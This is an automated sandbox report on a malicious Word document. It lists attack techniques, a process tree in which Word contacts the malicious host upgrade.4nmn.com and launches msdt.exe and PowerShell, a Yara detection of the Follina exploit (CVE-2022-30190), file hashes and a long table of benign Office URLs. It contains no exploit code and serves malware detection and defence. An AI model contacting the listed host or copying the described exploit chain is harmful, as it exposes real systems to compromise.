            Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
            Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; 1 Extra Window Memory Injection; Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
            Defense Evasion: 11 Masquerading; 251 Virtualization/Sandbox Evasion; 11 Process Injection; 1 DLL Side-Loading; 1 File Deletion; 1 Extra Window Memory Injection; Compile After Delivery; Indicator Removal from Tools; Masquerading
            Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
            Discovery: 1 Query Registry; 431 Security Software Discovery; 1 Process Discovery; 251 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 Remote System Discovery; 1 System Network Configuration Discovery; 2 File and Directory Discovery; 124 System Information Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
            Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
            Command and Control: 1 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
            Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
            Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
            Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction
            Behavior Graph ID: 648583, Sample: WF0SlQWKr1.docx, Startdate: 20/06/2022, Architecture: WINDOWS, Score: 100

            Sample: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); 5 other signatures
            • powershell.exe (52) started: Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines); 3 other signatures
              • conhost.exe started
              • ipconfig.exe (1) started
            • WINWORD.EXE (313 58) started: connected to upgrade.4nmn.com 116.203.251.9, 443, 49734, 49735 HETZNER-ASDE Germany; dropped C:\Users\user\AppData\...\WF0SlQWKr1.docx.LNK (MS), C:\Users\user\AppData\...\microsoft[1].htm (HTML), C:\Users\user\AppData\Local\...\7BB121F.htm (HTML), C:\Users\user\AppData\Local\...\14E38085.htm (HTML)
              • msdt.exe (21) started: dropped C:\Windows\Temp\...\DiagPackage.dll.mui (PE32), C:\Windows\Temp\...\DiagPackage.dll (PE32+)
              • MSOSYNC.EXE (5 12) started
            • csc.exe (3) started: dropped C:\Users\user\AppData\Local\...\05d3mwhu.dll (PE32)
              • cvtres.exe (1) started
            • 2 other processes started: dropped C:\Users\user\AppData\Local\...\qghxibcc.dll (PE32), C:\Users\user\AppData\Local\...\53i2jeo5.dll (PE32)
              • cvtres.exe (1) started
              • cvtres.exe (1) started

            Source | Detection | Scanner | Label
            WF0SlQWKr1.docx | 20% | Virustotal |
            Source | Detection | Scanner | Label
            C:\Windows\Temp\SDIAG_5429739b-e3bc-4aa7-b049-21dfa05c9515\DiagPackage.dll | 0% | Metadefender |
            C:\Windows\Temp\SDIAG_5429739b-e3bc-4aa7-b049-21dfa05c9515\DiagPackage.dll | 0% | ReversingLabs |
            C:\Windows\Temp\SDIAG_5429739b-e3bc-4aa7-b049-21dfa05c9515\en-US\DiagPackage.dll.mui | 0% | Metadefender |
            C:\Windows\Temp\SDIAG_5429739b-e3bc-4aa7-b049-21dfa05c9515\en-US\DiagPackage.dll.mui | 0% | ReversingLabs |
            No Antivirus matches
            Source | Detection | Scanner | Label
            upgrade.4nmn.com | 5% | Virustotal |
            Source | Detection | Scanner | Label
            https://roaming.edog. | 0% | URL Reputation | safe
            https://cdn.entity. | 0% | URL Reputation | safe
            https://powerlift.acompli.net | 0% | URL Reputation | safe
            https://rpsticket.partnerservices.getmicrosoftkey.com | 0% | URL Reputation | safe
            https://cortana.ai | 0% | URL Reputation | safe
            https://api.aadrm.com/ | 0% | URL Reputation | safe
            https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | URL Reputation | safe
            https://upgrade.4nmn.com/microsoft.html | 6% | Virustotal |
            https://upgrade.4nmn.com/microsoft.html | 100% | Avira URL Cloud | phishing
            https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h | 0% | Avira URL Cloud | safe
            https://res.getmicrosoftkey.com/api/redemptionevents | 0% | URL Reputation | safe
            https://powerlift-frontdesk.acompli.net | 0% | URL Reputation | safe
            https://officeci.azurewebsites.net/api/ | 0% | URL Reputation | safe
            https://store.office.cn/addinstemplate | 0% | URL Reputation | safe
            https://api.aadrm.com | 0% | URL Reputation | safe
            https://dev0-api.acompli.net/autodetect | 0% | URL Reputation | safe
            https://www.odwebp.svc.ms | 0% | URL Reputation | safe
            https://api.addins.store.officeppe.com/addinstemplate | 0% | URL Reputation | safe
            https://dataservice.o365filtering.com/ | 0% | URL Reputation | safe
            https://officesetup.getmicrosoftkey.com | 0% | URL Reputation | safe
            https://prod-global-autodetect.acompli.net/autodetect | 0% | URL Reputation | safe
            https://ncus.contentsync. | 0% | URL Reputation | safe
            https://apis.live.net/v5.0/ | 0% | URL Reputation | safe
            https://wus2.contentsync. | 0% | URL Reputation | safe
            https://asgsmsproxyapi.azurewebsites.net/ | 0% | URL Reputation | safe
            https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile | 0% | URL Reputation | safe
            https://ncus.pagecontentsync. | 0% | URL Reputation | safe
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            upgrade.4nmn.com | 116.203.251.9 | true | true | | unknown
            Name | Malicious | Antivirus Detection | Reputation
            https://upgrade.4nmn.com/microsoft.html | true | 6% Virustotal; Avira URL Cloud: phishing | unknown
            Name | Source | Malicious | Antivirus Detection | Reputation
            https://api.diagnosticssdf.office.com1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
              high
              https://login.microsoftonline.com/1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                high
                https://shell.suite.office.com:14431A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                  high
                  https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                    high
                    https://autodiscover-s.outlook.com/1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                      high
                      https://roaming.edog.1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                      • URL Reputation: safe
                      unknown
                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                        high
                        https://cdn.entity.1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                        • URL Reputation: safe
                        unknown
                        https://api.addins.omex.office.net/appinfo/query1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                          high
                          https://clients.config.office.net/user/v1.0/tenantassociationkey1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                            high
                            https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                              high
                              https://powerlift.acompli.net1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                              • URL Reputation: safe
                              unknown
                              https://rpsticket.partnerservices.getmicrosoftkey.com1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                              • URL Reputation: safe
                              unknown
                              https://lookup.onenote.com/lookup/geolocation/v11A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                high
                                https://cortana.ai1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                • URL Reputation: safe
                                unknown
                                https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                  high
                                  https://cloudfiles.onenote.com/upload.aspx1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                    high
                                    https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                      high
                                      https://entitlement.diagnosticssdf.office.com1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                        high
                                        https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                          high
                                          https://api.aadrm.com/1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://ofcrecsvcapi-int.azurewebsites.net/1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                            high
                                            https://api.microsoftstream.com/api/1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                              high
                                              https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                high
                                                https://cr.office.com1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                  high
                                                  https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                  • Avira URL Cloud: safe
                                                  low
                                                  https://portal.office.com/account/?ref=ClientMeControl1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                    high
                                                    https://graph.ppe.windows.net1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                      high
                                                      https://res.getmicrosoftkey.com/api/redemptionevents1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://powerlift-frontdesk.acompli.net1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://tasks.office.com1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                        high
                                                        https://officeci.azurewebsites.net/api/1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://sr.outlook.office.net/ws/speech/recognize/assistant/work1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                          high
                                                          https://store.office.cn/addinstemplate1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://api.aadrm.com1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://outlook.office.com/autosuggest/api/v1/init?cvid=1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                            high
                                                            https://globaldisco.crm.dynamics.com1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                              high
                                                              https://messaging.engagement.office.com/1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                high
                                                                https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                  high
                                                                  https://dev0-api.acompli.net/autodetect1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://www.odwebp.svc.ms1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://api.diagnosticssdf.office.com/v2/feedback1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                    high
                                                                    https://api.powerbi.com/v1.0/myorg/groups1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                      high
                                                                      https://web.microsoftstream.com/video/1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                        high
                                                                        https://api.addins.store.officeppe.com/addinstemplate1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://graph.windows.net1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                          high
                                                                          https://dataservice.o365filtering.com/1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://officesetup.getmicrosoftkey.com1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://analysis.windows.net/powerbi/api1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                            high
                                                                            https://prod-global-autodetect.acompli.net/autodetect1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://outlook.office365.com/autodiscover/autodiscover.json1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                              high
                                                                              https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                high
                                                                                https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                  high
                                                                                  https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                    high
                                                                                    https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                      high
                                                                                      https://ncus.contentsync.1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                        high
                                                                                        https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                          high
                                                                                          http://weather.service.msn.com/data.aspx1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                            high
                                                                                            https://apis.live.net/v5.0/1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                              high
                                                                                              https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                high
                                                                                                https://messaging.lifecycle.office.com/1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                  high
                                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                    high
                                                                                                    https://management.azure.com1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                      high
                                                                                                      https://outlook.office365.com1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                        high
                                                                                                        https://wus2.contentsync.1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        https://incidents.diagnostics.office.com1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                          high
                                                                                                          https://clients.config.office.net/user/v1.0/ios1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                            high
                                                                                                            https://insertmedia.bing.office.net/odc/insertmedia1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                              high
                                                                                                              https://o365auditrealtimeingestion.manage.office.com1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office365.com/api/v1.0/me/Activities1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                  high
                                                                                                                  https://api.office.net1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                    high
                                                                                                                    https://incidents.diagnosticssdf.office.com1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                      high
                                                                                                                      https://asgsmsproxyapi.azurewebsites.net/1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      https://clients.config.office.net/user/v1.0/android/policies1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                        high
                                                                                                                        https://entitlement.diagnostics.office.com1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                          high
                                                                                                                          https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                            high
                                                                                                                            https://substrate.office.com/search/api/v2/init1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                              high
                                                                                                                              https://outlook.office.com/1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                                high
                                                                                                                                https://storage.live.com/clientlogs/uploadlocation1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://outlook.office365.com/1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://webshell.suite.office.com1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://substrate.office.com/search/api/v1/SearchHistory1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://management.azure.com/1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://messaging.lifecycle.office.com/getcustommessage161A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://clients.config.office.net/c2r/v1.0/InteractiveInstallation1A14DD78-7595-4E74-B4A0-6406491222F4.0.drfalse
                                                                                                                                                high
| URL | Source | Malicious | Reputation |
|---|---|---|---|
| https://login.windows.net/common/oauth2/authorize | 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | false | high |
| https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile | 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | false | unknown (URL Reputation: safe) |
| https://graph.windows.net/ | 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | false | high |
| https://api.powerbi.com/beta/myorg/imports | 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | false | high |
| https://devnull.onenote.com | 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | false | high |
| https://messaging.action.office.com/ | 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | false | high |
| https://ncus.pagecontentsync. | 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | false | unknown (URL Reputation: safe) |
| https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json | 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | false | high |
| https://messaging.office.com/ | 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | false | high |
| https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile | 1A14DD78-7595-4E74-B4A0-6406491222F4.0.dr | false | high |
Legend (share of contacted IPs per country):
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 116.203.251.9 | upgrade.4nmn.com | Germany | 24940 | HETZNER-ASDE | true |
Joe Sandbox Version: 35.0.0 Citrine
Analysis ID: 648583
Start date and time: 2022-06-20 08:28:49 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 44s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: WF0SlQWKr1.docx
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Potential for more IOCs and behavior
Number of new started processes analysed: 42
Number of new started drivers analysed: 1
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.expl.evad.winDOCX@18/44@2/1
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .docx
• Adjust boot time
• Enable AMSI
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, backgroundTaskHost.exe, sdiagnhost.exe, mrxdav.sys, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, conhost.exe, SgrmBroker.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 52.109.32.24, 52.109.12.24, 52.109.76.35, 52.109.76.34
• Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, summit.didns.ru, settings-win.data.microsoft.com, arc.msn.com, ris.api.iris.microsoft.com, go.microsoft.com, store-images.s-microsoft.com, login.live.com, config.officeapps.live.com, sls.update.microsoft.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size getting too big, too many NtCreateFile calls found
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryAttributesFile calls found
• Report size getting too big, too many NtQueryVolumeInformationFile calls found
| Time | Type | Description |
|---|---|---|
| 08:31:27 | API Interceptor | 76x Sleep call for process: powershell.exe modified |
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: Microsoft Access Database
Category: dropped
Size (bytes): 528384
Entropy (8bit): 0.4754802582989672
Encrypted: false
SSDEEP: 384:NGfX4CJCmw8SFYfZ0jGBMmnxWBwtZ1IB+hVZO4Fg:YfXPC1HoZiMAB/iI
MD5: 2F97B30E8435890411336A091A4E9BF1
SHA1: A3392276FE3DF0B8E70B009C0410208C8A3D696A
SHA-256: 0E5BC7D0CC47B23124EC3A260BFCAA36E2584AF750240A5192ACABCD81020D99
SHA-512: 210B18A898828EA57D63A8872A2BD67BE00D06A78EECADE80CC1D2AB0A3FF382B63A9852D7A8FD6167AF0726D371B318693D02D7D2EEEF6D94927B524879C4F2
Malicious: false
Preview: ....Standard ACE DB......n.b`..U.gr@?..~.....1.y..0...c...F...N:U.7...z.(...`.:{6I...Z.Cs..3..y[..|*..|.....V.'...f_...$.g..'D...e....F.x....-b.T...4.0.

Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 36
Entropy (8bit): 2.730660070105504
Encrypted: false
SSDEEP: 3:5NixJlElGUR:WrEcUR
MD5: 1F830B53CA33A1207A86CE43177016FA
SHA1: BDF230E1F33AFBA5C9D5A039986C6505E8B09665
SHA-256: EAF9CDC741596275E106DDDCF8ABA61240368A8C7B0B58B08F74450D162337EF
SHA-512: 502248E893FCFB179A50863D7AC1866B5A466C9D5781499EBC1D02DF4F6D3E07B9E99E0812E747D76734274BD605DAD6535178D6CE06F08F1A02AB60335DE066
Malicious: false
Preview: C.e.n.t.r.a.l.T.a.b.l.e...a.c.c.d.b.

Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.3860360556164644
Encrypted: false
SSDEEP: 3:OFaV:iu
MD5: 91E91175EF0AB69EE1660DC75973E103
SHA1: 80EB1413A74C338E0F857EA75CBA87BFFA7512D0
SHA-256: 2ACB0CB42BD1E4857BC4A5C1CF20AD3D7969A2E9BA955F313CF6D0A5E0B0FD1B
SHA-512: 03355BA9D7AB8F32BFFD01F5F6D3133958014701D1B24A6318CBD9038E74DAC97AB10A368B407856E43E5B2A0AEEDECF1B67C1FF74B6AF274E20B8F4A1954249
Malicious: false
Preview: 878411. Admin.

Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 148957
Entropy (8bit): 5.356714019459071
Encrypted: false
SSDEEP: 1536:AcQW/gxgB5BQguw5/Q9DQC+zQWk4F77nXmvid3Xx4ETLKz6e:zJQ9DQC+zPXLI
MD5: 4595E386A598DA2BF38F2F011B4DAD46
SHA1: DF7A8EA141BC22534A314374866C6C6D33E0A53B
SHA-256: B16E386723A5591BD32FBC5807A228C67E5AC2F9C7DB1D126FE9B171C02378D2
SHA-512: 825094DC0D0786A3AA591014314ED4DD1D95F5BC0CB9D326FC65AC7386093783065FA03FFC1F05836E102D84124E89E32446BE97B0287E37FED61AC8F36166BE
Malicious: false
Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-06-20T06:29:49">.. Build: 16.0.15414.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: HTML document, ASCII text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 7402
Entropy (8bit): 5.226010384682191
Encrypted: false
SSDEEP: 192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdi2UPiqSreh+8G0c:wDwIwERY5V7V2Pijeh+8Dc
MD5: 1752A5A6F9DD417B3B23CAD74B0572DD
SHA1: F49AEBF28D75BAF7F3BA73B70B475D4669F0D484
SHA-256: BE10A1D15EBDD53CACBEFB1001DAA750BA33FBEE573A0C4381255AF74A8C78D2
SHA-512: 8D62737424720405830E5E96831C1CDDBDC362EA7EC4D409DC5E05ADA987185115D344943A70BEE0B1EE77FA50B94FD55EDC2662ECB0D030540508BDEF1F58F8
Malicious: true
Yara Hits:
• Rule: SUSP_obfuscated_JS_obfuscatorio, Description: Detect JS obfuscation done by the js obfuscator (often malicious), Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\14E38085.htm, Author: @imp0rtp3
• Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\14E38085.htm, Author: Joe Security
